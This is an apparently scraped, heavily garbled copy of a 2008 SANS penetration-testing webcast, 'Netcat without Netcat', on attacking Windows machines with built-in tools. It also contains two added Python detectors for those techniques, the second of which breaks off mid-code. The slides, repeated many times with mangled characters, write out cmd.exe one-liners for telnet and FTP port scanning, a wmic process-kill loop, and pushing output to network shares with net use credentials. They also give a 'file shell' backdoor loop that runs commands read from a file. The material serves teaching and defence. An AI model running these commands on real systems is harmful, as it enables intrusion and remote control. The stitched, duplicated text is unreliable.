• C:\> for /L %i in (1,1,1024) do echo Checking Port %i >> ports.txt & echo open [IP_addr] %i > ftp.txt & echo quit >> ftp.txt & ftp -s:ftp.txt 2>>ports.txt
Windows Command-Line File Transfer
• File transfer on arbitrary ports is hard
• But we can use Windows file and print sharing on the command line, redirecting to shares
• C:\> type [filename] > \\[machine]\[share]\[filename]
• Will use the current user's credentials…
• Or, if you want different credentials, first do a
  – C:\> net use \\[machine] [password] /u:[user]
• Can't we just use copy or move? Yes, but relying on redirection (>) of Standard Out is nice here
  – Because we can redirect the output of commands across the network, not just files
File Transfer in Action
Backdoors: The File Shell
• Now, let's do a backdoor
• Listening on a port is hard…
• But we can look in the file system
• A FOR loop can spin, looking for a command in a file, run the command, and dump output to another file
• C:\> for /L %i in (1,0,2) do (for /f "delims=^" %j in (commands.txt) do cmd.exe /c %j >> output.txt & del commands.txt) & ping -n 2 127.0.0.1
Using the File Shell
• Now we can feed it commands by echoing them into \\[IP_addr]\[share]\commands.txt
• And we can read results by using type to read \\[IP_addr]\[share]\output.txt
• The file shell is a building block…
  – Other folks are starting to use it, extending the idea
  – Use the FTP client to move commands on arbitrary ports, writing them into the file system
  – Or rely on nslookup to pull domain names that include commands
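The conclusions slide later in this deck says defenders need to be able to interpret these moves. As an added example (not from the webcast or its author), here is a small Python triage script that looks for the command-line shapes shown on the telnet and FTP port-scanner slides, the file-transfer slide, and the file-shell slide, in Windows process-creation events such as Sysmon Event ID 1 or Security 4688. The event tuples, host names, target addresses, timestamps and thresholds are all constructed for this example, and the regular expressions are my own approximations of the page's commands rather than any vendor's detection content.

```python
"""Added example: flag 'Netcat without Netcat' command-line patterns in
Windows process-creation events. Everything here (events, hosts, thresholds,
regexes) is constructed for illustration; none of it is from the webcast."""
import re
from collections import defaultdict
from datetime import datetime

# Constructed sample events: (timestamp, host, command line). Hosts and target
# addresses are invented; the command lines mirror the slides of this talk.
SAMPLE_EVENTS = [
    ("2008-08-01T10:00:00", "WS01", "telnet 10.1.1.5 21"),
    ("2008-08-01T10:00:01", "WS01", "telnet 10.1.1.5 22"),
    ("2008-08-01T10:00:02", "WS01", "telnet 10.1.1.5 23"),
    ("2008-08-01T10:00:03", "WS01", "telnet 10.1.1.5 24"),
    ("2008-08-01T10:00:04", "WS01", "telnet 10.1.1.5 25"),
    ("2008-08-01T10:00:05", "WS01", 'wmic process where name="telnet.exe" delete'),
    ("2008-08-01T10:05:00", "WS02", "ftp -s:ftp.txt"),
    ("2008-08-01T10:05:01", "WS02", "ftp -s:ftp.txt"),
    ("2008-08-01T10:05:02", "WS02", "ftp -s:ftp.txt"),
    ("2008-08-01T10:05:03", "WS02", "ftp -s:ftp.txt"),
    ("2008-08-01T10:05:04", "WS02", "ftp -s:ftp.txt"),
    ("2008-08-01T10:20:00", "WS03", r"net use \\FILESRV Passw0rd /u:corp\jdoe"),
    ("2008-08-01T10:20:05", "WS03", r"cmd.exe /c type report.txt > \\FILESRV\share\report.txt"),
    ("2008-08-01T11:00:00", "WS04", 'cmd.exe /c for /L %i in (1,0,2) do (for /f "delims=^" %j '
                                    'in (commands.txt) do cmd.exe /c %j >> output.txt '
                                    '& del commands.txt) & ping -n 2 127.0.0.1'),
    ("2008-08-01T12:00:00", "WS05", "ftp ftp.example.com"),  # ordinary interactive use
    ("2008-08-01T12:01:00", "WS05", "telnet router1 23"),    # one telnet is not a sweep
]

# Single-event indicators, each tied to one slide of the talk.
INDICATORS = {
    # telnet slide: loop that kills the hung telnet client every few seconds
    "telnet-process-kill": re.compile(
        r'\bwmic\s+process\s+where\s+name\s*=\s*"?telnet\.exe"?\s+delete', re.I),
    # FTP slides: ftp driven by a command file, which is how a port gets chosen
    "ftp-scripted": re.compile(r'\bftp(?:\.exe)?\s+-s:', re.I),
    # file-transfer slide: explicit share credentials, and output redirected to a UNC path
    "net-use-explicit-creds": re.compile(
        r'\bnet\s+use\s+\\\\\S+\s+\S+\s+/u(?:ser)?:', re.I),
    "redirect-to-unc": re.compile(r'>>?\s*\\\\[^\\\s]+\\[^\\\s]+', re.I),
    # file-shell slide: FOR /F reading a command file and handing each line to cmd /c
    "file-shell-loop": re.compile(
        r'for\s+/f\s+"?delims=[^"\s]*"?\s+%+\w+\s+in\s+\(\S+\)\s+do\s+'
        r'cmd(?:\.exe)?\s+/c\s+%+\w+\s*>>', re.I),
}

# "telnet <target> <port>": the per-port child spawned by the telnet-loop scanner
TELNET_RE = re.compile(r'\btelnet(?:\.exe)?\s+(\S+)\s+(\d{1,5})\b', re.I)


def classify(cmdline):
    """Names of every single-event indicator that matches one command line."""
    return [name for name, rx in INDICATORS.items() if rx.search(cmdline)]


def _ts(s):
    return datetime.strptime(s, "%Y-%m-%dT%H:%M:%S")


def find_bursts(events, window_seconds=60, min_count=5):
    """Indicators that need more than one event: a host that telnets to
    >= min_count distinct ports of one target, or runs a scripted ftp
    >= min_count times, inside a sliding window.
    Returns a sorted list of (host, kind, target_or_None, count)."""
    telnet_hits = defaultdict(list)  # (host, target) -> [(time, port)]
    ftp_hits = defaultdict(list)     # host -> [time]
    for ts, host, cmd in events:
        m = TELNET_RE.search(cmd)
        if m:
            telnet_hits[(host, m.group(1))].append((_ts(ts), int(m.group(2))))
        elif INDICATORS["ftp-scripted"].search(cmd):
            ftp_hits[host].append(_ts(ts))
    alerts = []
    for (host, target), hits in telnet_hits.items():
        hits.sort()
        for i, (t0, _) in enumerate(hits):
            ports = {p for t, p in hits[i:] if (t - t0).total_seconds() <= window_seconds}
            if len(ports) >= min_count:
                alerts.append((host, "telnet-port-sweep", target, len(ports)))
                break
    for host, times in ftp_hits.items():
        times.sort()
        for i, t0 in enumerate(times):
            n = sum(1 for t in times[i:] if (t - t0).total_seconds() <= window_seconds)
            if n >= min_count:
                alerts.append((host, "scripted-ftp-burst", None, n))
                break
    return sorted(alerts, key=lambda a: (a[0], a[1]))


def triage(events, **burst_kwargs):
    """One report per host: the sorted union of single-event and burst indicators."""
    report = defaultdict(set)
    for _, host, cmd in events:
        kinds = classify(cmd)
        if kinds:
            report[host].update(kinds)
    for host, kind, _, _ in find_bursts(events, **burst_kwargs):
        report[host].add(kind)
    return {host: sorted(kinds) for host, kinds in report.items()}


if __name__ == "__main__":
    for host, kinds in triage(SAMPLE_EVENTS).items():
        print(f"{host}: {', '.join(kinds)}")
```

The per-event regexes catch the distinctive shapes (the wmic kill loop, `ftp -s:`, `net use` with an inline password, redirection to a UNC path, the FOR /F command-file loop); the burst logic catches what a single event cannot, a host spawning telnet against many ports of one target or running scripted ftp over and over, which is what the loops on the scanner slides look like from the endpoint's side. Thresholds are deliberately parameters, since an environment's normal telnet and ftp use decides where the line sits.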
The File Shell In Action
Outline
• Building a Penetration Test Infrastructure
• Netcat without Netcat
• Conclusions
• Q&A
Conclusions
• Netcat without Netcat shows that, with only individual command execution on a target machine, an attacker can use built-in tools to wield significant control over the target box
• Defenders need to be able to interpret attackers' actions and anticipate their moves
• Penetration testers need to be able to make the most of built-in tools to operate within the rules of engagement for their projects
• Netcat without Netcat serves these goals
Follow-Up
• SANS Security 560: Network Penetration Testing and Ethical Hacking
• 20% discount if you registered for this webcast
  – Use registration discount code of PENTEST20
• Discount applies to 560 course through August:
  – June 4-9, Las Vegas, NV, Skoudis
  – June 12-July 22, Home, On-Line, Skoudis
  – July 24-29, Wash DC, Skoudis
  – Aug 11-16, Boston, Shackleford
  – Aug 18-23, Minneapolis, Conrad
  – Aug 24-29, Va Beach, Strand
• Go to www.sans.org and look for "560" for details
Outline
• Why Penetration Testing?
• Windows Command Line Tips for Pen Testers
• Conclusions
• Q&A
  – REMEMBER: The third webcast in this series of three will be on August 21, 2008
Page 25
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2539
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 25
Building Blocks
Windows FOR Loopsbull Iteration can be very helpful
ndash Wersquore not expecting you to be programmers ndash But sometimes yoursquoll want to iterate over a given set of
itemsbull Numbers
bull Lines in a file
bull The Windows command line supports several kinds of FOR loopshellip some of the most useful are ndash FOR L Counter
ndash FOR F Iterate over file contents strings or commandoutput
bull See the first webcast in this series for details on how
these workhellip we wonrsquot go through them again here
Windows Port Scanner Using
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2639
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 26
Windows Port Scanner Using
Telnet Clientbull We could systematically telnet to port after portndash Cgt for L i in (111024) do telnet [IPaddr] i
bull Problem When it finds an open port it hangsbull How to address
ndash Watch ithellip When it stops hit CTRL-[ and then type quit to resume
ndash Or kill the telnet client every 5 secondsbull Cgt for L i in (102) do wmic process where
name=telnetexe delete amp ping -n 6 127001
ndash Downside Race condition may kill one that hasnrsquot finished checking
M P bl ith Wi d
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2739
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 27
More Problems with Windows
Telnet Client as a Port Scannerbull Other problems
ndash Results arenrsquot loggedbull You canrsquot do anything with Standard Out of telnet client
ndash Attempts at redirection either make it hang or not run
bull And the logging option of the Windows telnet client (-l[filename]) overwrites all earlier logshellip No append option
bull So you have to watch it sadly
ndash Most versions of Vista do not include telnetclient by defaultbull But Netcat without Netcat is about living off the land
bull There must be a better way
Wi d P t S U i
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2839
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 28
Windows Port Scanner Using
FTP Clientbull Windows FTP client Cgt ftp [IPaddr]
bull Problem Canrsquot specify port to connect to on theinvocation command linehellip only connects to TCP port 21
bull Solution But you can specify dest port in an FTP
command file ndash open [IPaddr] [port]
bull Then the ftp client can read the contents of that file anddo what it says by being invoked withndash Cgt ftp ndashs[filename]
bull Wersquoll write a loop that generates an FTP command fileand invokes FTP to run commands from that file
displaying or storing results at each iteration
Th Wi d C d Li
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2939
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 29
The Windows Command Line
Port Scanner Using FTP Clientbull Cgt for L i in (111024) do
echo open [IPaddr] i gt ftptxt ampecho quit gtgt ftptxt amp ftp-sftptxt
bull Problem It hangs for about 30 seconds onopen port then moves on ndash Thatrsquos not so bad
bull Another Problem It doesnrsquot store results ndash We can fix that but it gets a little ugly
Making It Store Results
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3039
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 30
Making It Store Resultsbull Cgt for L i in
(111024) do
echo Checking
Port i gtgt
portstxt amp echoopen [IP_addr] i
gt ftptxt amp echo
quit gtgt ftptxt ampftp -sftptxt
2gtgtportstxt
Windows Command Line File Transfer
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3139
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 31
Windows Command-Line File Transfer
bull File transfer on arbitrary ports is hardbull But we can use Windows file and print sharing on
the command line redirecting to shares
bull Cgt type [filename] gt[machine][share][filename]
bull Will use current user credentialshellip
bull Or if you want different credentials first do andash Cgt net use [machine] [password]u[user]
bull Canrsquot we just use copy or move Yes but relyingon redirection (gt) of Standard Out is nice here ndash Because we can redirect the output of commands
across the network not just files
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3239
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 32
File Transfer in Action
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3339
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 33
Backdoors The File Shellbull Now letrsquos do a backdoor
bull Listening on a port is hardhellipbull But we can look in the file system
bull A FOR loop can spin looking for a commandin a file run the command and dump outputto another file
bull Cgt for L i in (102) do (forf delims=^ j in (commandstxt)do cmdexe c j gtgt outputtxt ampdel commandstxt) amp ping -n 2127001
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3439
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 34
Using the File Shell
bull Now we can feed it commands by echoing theminto [IP_addr][share]commandstxt
bull And we can read results by using type to read[IP_addr][share]outputtxt
bull The file shell is a building blockhellip ndash Other folks are starting to use it extending the idea
ndash Use FTP client to move commands on arbitrary portswriting them into the file system
ndash Or rely on nslookup to pull domain names that includecommands
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3539
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 35
The File Shell In Action
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3639
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 36
Outline
bull Building a Penetration TestInfrastructure
bull Netcat without Netcatbull Conclusions
bull QampA
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3739
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 37
Conclusionsbull Netcat without Netcat shows that with only individual
command execution on a target machine an attackercan use built-in tools to wield significant control overthe target box
bull Defenders need to be able to interpret attackersrsquo actions and anticipate their moves
bull Penetration testers need to be able to make the most
of built-in tools to operate within the rules of engagement for their projects
bull Netcat without Netcat serves these goals
Follo Up
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3839
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 38
Follow-Upbull SANS Security 560 Network Penetration Testing
and Ethical Hacking
bull 20 discount if you registered for this webcast ndash Use registration discount code of PENTEST20
bull Discount applies to 560 course through August
ndash June 4-9 Las Vegas NV Skoudis ndash June 12-July 22 Home On-Line Skoudis
ndash July 24-29 Wash DC Skoudis
ndash Aug 11-16 Boston Shackleford ndash Aug 18-23 Minneapolis Conrad
ndash Aug 24-29 Va Beach Strand
bull Go to wwwsansorg and look for ldquo560rdquo for details
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3939
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 39
Outlinebull Why Penetration Testing
bull Windows Command Line Tips for PenTesters
bull Conclusions
bull QampA
ndash REMEMBER The third webcast in thisseries of three will be on August 21 2008
Page 26
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2639
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 26
Windows Port Scanner Using
Telnet Clientbull We could systematically telnet to port after portndash Cgt for L i in (111024) do telnet [IPaddr] i
bull Problem When it finds an open port it hangsbull How to address
ndash Watch ithellip When it stops hit CTRL-[ and then type quit to resume
ndash Or kill the telnet client every 5 secondsbull Cgt for L i in (102) do wmic process where
name=telnetexe delete amp ping -n 6 127001
ndash Downside Race condition may kill one that hasnrsquot finished checking
M P bl ith Wi d
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2739
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 27
More Problems with Windows
Telnet Client as a Port Scannerbull Other problems
ndash Results arenrsquot loggedbull You canrsquot do anything with Standard Out of telnet client
ndash Attempts at redirection either make it hang or not run
bull And the logging option of the Windows telnet client (-l[filename]) overwrites all earlier logshellip No append option
bull So you have to watch it sadly
ndash Most versions of Vista do not include telnetclient by defaultbull But Netcat without Netcat is about living off the land
bull There must be a better way
Wi d P t S U i
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2839
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 28
Windows Port Scanner Using
FTP Clientbull Windows FTP client Cgt ftp [IPaddr]
bull Problem Canrsquot specify port to connect to on theinvocation command linehellip only connects to TCP port 21
bull Solution But you can specify dest port in an FTP
command file ndash open [IPaddr] [port]
bull Then the ftp client can read the contents of that file anddo what it says by being invoked withndash Cgt ftp ndashs[filename]
bull Wersquoll write a loop that generates an FTP command fileand invokes FTP to run commands from that file
displaying or storing results at each iteration
Th Wi d C d Li
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2939
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 29
The Windows Command Line
Port Scanner Using FTP Clientbull Cgt for L i in (111024) do
echo open [IPaddr] i gt ftptxt ampecho quit gtgt ftptxt amp ftp-sftptxt
bull Problem It hangs for about 30 seconds onopen port then moves on ndash Thatrsquos not so bad
bull Another Problem It doesnrsquot store results ndash We can fix that but it gets a little ugly
Making It Store Results
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3039
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 30
Making It Store Resultsbull Cgt for L i in
(111024) do
echo Checking
Port i gtgt
portstxt amp echoopen [IP_addr] i
gt ftptxt amp echo
quit gtgt ftptxt ampftp -sftptxt
2gtgtportstxt
Windows Command Line File Transfer
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3139
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 31
Windows Command-Line File Transfer
bull File transfer on arbitrary ports is hardbull But we can use Windows file and print sharing on
the command line redirecting to shares
bull Cgt type [filename] gt[machine][share][filename]
bull Will use current user credentialshellip
bull Or if you want different credentials first do andash Cgt net use [machine] [password]u[user]
bull Canrsquot we just use copy or move Yes but relyingon redirection (gt) of Standard Out is nice here ndash Because we can redirect the output of commands
across the network not just files
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3239
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 32
File Transfer in Action
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3339
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 33
Backdoors The File Shellbull Now letrsquos do a backdoor
bull Listening on a port is hardhellipbull But we can look in the file system
bull A FOR loop can spin looking for a commandin a file run the command and dump outputto another file
bull Cgt for L i in (102) do (forf delims=^ j in (commandstxt)do cmdexe c j gtgt outputtxt ampdel commandstxt) amp ping -n 2127001
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3439
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 34
Using the File Shell
bull Now we can feed it commands by echoing theminto [IP_addr][share]commandstxt
bull And we can read results by using type to read[IP_addr][share]outputtxt
bull The file shell is a building blockhellip ndash Other folks are starting to use it extending the idea
ndash Use FTP client to move commands on arbitrary portswriting them into the file system
ndash Or rely on nslookup to pull domain names that includecommands
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3539
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 35
The File Shell In Action
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3639
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 36
Outline
bull Building a Penetration TestInfrastructure
bull Netcat without Netcatbull Conclusions
bull QampA
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3739
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 37
Conclusionsbull Netcat without Netcat shows that with only individual
command execution on a target machine an attackercan use built-in tools to wield significant control overthe target box
bull Defenders need to be able to interpret attackersrsquo actions and anticipate their moves
bull Penetration testers need to be able to make the most
of built-in tools to operate within the rules of engagement for their projects
bull Netcat without Netcat serves these goals
Follo Up
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3839
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 38
Follow-Upbull SANS Security 560 Network Penetration Testing
and Ethical Hacking
bull 20 discount if you registered for this webcast ndash Use registration discount code of PENTEST20
bull Discount applies to 560 course through August
ndash June 4-9 Las Vegas NV Skoudis ndash June 12-July 22 Home On-Line Skoudis
ndash July 24-29 Wash DC Skoudis
ndash Aug 11-16 Boston Shackleford ndash Aug 18-23 Minneapolis Conrad
ndash Aug 24-29 Va Beach Strand
bull Go to wwwsansorg and look for ldquo560rdquo for details
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3939
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 39
Outlinebull Why Penetration Testing
bull Windows Command Line Tips for PenTesters
bull Conclusions
bull QampA
ndash REMEMBER The third webcast in thisseries of three will be on August 21 2008
Page 27
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2739
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 27
More Problems with Windows
Telnet Client as a Port Scannerbull Other problems
ndash Results arenrsquot loggedbull You canrsquot do anything with Standard Out of telnet client
ndash Attempts at redirection either make it hang or not run
bull And the logging option of the Windows telnet client (-l[filename]) overwrites all earlier logshellip No append option
bull So you have to watch it sadly
ndash Most versions of Vista do not include telnetclient by defaultbull But Netcat without Netcat is about living off the land
bull There must be a better way
Wi d P t S U i
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2839
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 28
Windows Port Scanner Using
FTP Clientbull Windows FTP client Cgt ftp [IPaddr]
bull Problem Canrsquot specify port to connect to on theinvocation command linehellip only connects to TCP port 21
bull Solution But you can specify dest port in an FTP
command file ndash open [IPaddr] [port]
bull Then the ftp client can read the contents of that file anddo what it says by being invoked withndash Cgt ftp ndashs[filename]
bull Wersquoll write a loop that generates an FTP command fileand invokes FTP to run commands from that file
displaying or storing results at each iteration
Th Wi d C d Li
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2939
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 29
The Windows Command Line
Port Scanner Using FTP Clientbull Cgt for L i in (111024) do
echo open [IPaddr] i gt ftptxt ampecho quit gtgt ftptxt amp ftp-sftptxt
bull Problem It hangs for about 30 seconds onopen port then moves on ndash Thatrsquos not so bad
bull Another Problem It doesnrsquot store results ndash We can fix that but it gets a little ugly
Making It Store Results
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3039
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 30
Making It Store Resultsbull Cgt for L i in
(111024) do
echo Checking
Port i gtgt
portstxt amp echoopen [IP_addr] i
gt ftptxt amp echo
quit gtgt ftptxt ampftp -sftptxt
2gtgtportstxt
Windows Command Line File Transfer
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3139
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 31
Windows Command-Line File Transfer
bull File transfer on arbitrary ports is hardbull But we can use Windows file and print sharing on
the command line redirecting to shares
bull Cgt type [filename] gt[machine][share][filename]
bull Will use current user credentialshellip
bull Or if you want different credentials first do andash Cgt net use [machine] [password]u[user]
bull Canrsquot we just use copy or move Yes but relyingon redirection (gt) of Standard Out is nice here ndash Because we can redirect the output of commands
across the network not just files
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3239
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 32
File Transfer in Action
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3339
Network Pen Testing & Ethical Hacking - ©2008 Ed Skoudis 28
Windows Port Scanner Using FTP Client
• Windows FTP client: C:\> ftp [IPaddr]
• Problem: Can't specify port to connect to on the invocation command line… only connects to TCP port 21
• Solution: But you can specify dest port in an FTP command file
  – open [IPaddr] [port]
• Then the ftp client can read the contents of that file and do what it says by being invoked with
  – C:\> ftp -s:[filename]
• We'll write a loop that generates an FTP command file and invokes FTP to run commands from that file, displaying or storing results at each iteration
Network Pen Testing & Ethical Hacking - ©2008 Ed Skoudis 29
The Windows Command Line Port Scanner Using FTP Client
• C:\> for /L %i in (1,1,1024) do echo open [IPaddr] %i > ftp.txt & echo quit >> ftp.txt & ftp -s:ftp.txt
• Problem: It hangs for about 30 seconds on an open port, then moves on
  – That's not so bad
• Another Problem: It doesn't store results
  – We can fix that, but it gets a little ugly
Network Pen Testing & Ethical Hacking - ©2008 Ed Skoudis 30
Making It Store Results
• C:\> for /L %i in (1,1,1024) do echo Checking Port %i >> ports.txt & echo open [IP_addr] %i > ftp.txt & echo quit >> ftp.txt & ftp -s:ftp.txt 2>>ports.txt
Network Pen Testing & Ethical Hacking - ©2008 Ed Skoudis 31
Windows Command-Line File Transfer
• File transfer on arbitrary ports is hard
• But we can use Windows file and print sharing on the command line, redirecting to shares
• C:\> type [filename] > \\[machine]\[share]\[filename]
• Will use current user credentials…
• Or, if you want different credentials, first do a
  – C:\> net use \\[machine] [password] /u:[user]
• Can't we just use copy or move? Yes, but relying on redirection (>) of Standard Out is nice here
  – Because we can redirect the output of commands across the network, not just files
Network Pen Testing & Ethical Hacking - ©2008 Ed Skoudis 32
File Transfer in Action
Network Pen Testing & Ethical Hacking - ©2008 Ed Skoudis 33
Backdoors: The File Shell
• Now, let's do a backdoor
• Listening on a port is hard…
• But we can look in the file system
• A FOR loop can spin, looking for a command in a file, run the command, and dump output to another file
• C:\> for /L %i in (1,0,2) do (for /f "delims=^" %j in (commands.txt) do cmd.exe /c %j >> output.txt & del commands.txt) & ping -n 2 127.0.0.1
Network Pen Testing & Ethical Hacking - ©2008 Ed Skoudis 34
Using the File Shell
• Now, we can feed it commands by echoing them into \\[IP_addr]\[share]\commands.txt
• And we can read results by using type to read \\[IP_addr]\[share]\output.txt
• The file shell is a building block…
  – Other folks are starting to use it, extending the idea
  – Use FTP client to move commands on arbitrary ports, writing them into the file system
  – Or rely on nslookup to pull domain names that include commands
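Detection logic for the three cmd.exe idioms covered above (the FTP script-file port scanner, command output redirected to a share, and the file-shell loop), as an added example that is not from the webcast: it runs regex rules over constructed process-creation command lines and collapses the hits into one verdict per event. Sysmon Event ID 1 or Windows Security 4688 records are the assumed real source; the sample events, hosts, rule names and verdict strings are this example's own.

```python
"""Detect the 'Netcat without Netcat' cmd.exe idioms in process-creation telemetry.

Added example, not part of the original SANS webcast. The events below are
constructed; in practice the command lines would come from Sysmon Event ID 1
or Windows Security 4688 (with command-line auditing enabled).
"""
import re
from typing import Dict, List, Optional, Set

# Rule name -> regex over the CommandLine field. %i (typed interactively) and
# %%i (inside a batch file) loop variables are both accepted.
RULES = {
    # ftp.exe driven by a command file: "ftp -s:ftp.txt" (the port-scanner slide)
    "ftp_script_file": re.compile(r"\bftp(\.exe)?\b[^&|]*\s-s:", re.I),
    # any "for /L %i in (" counting loop
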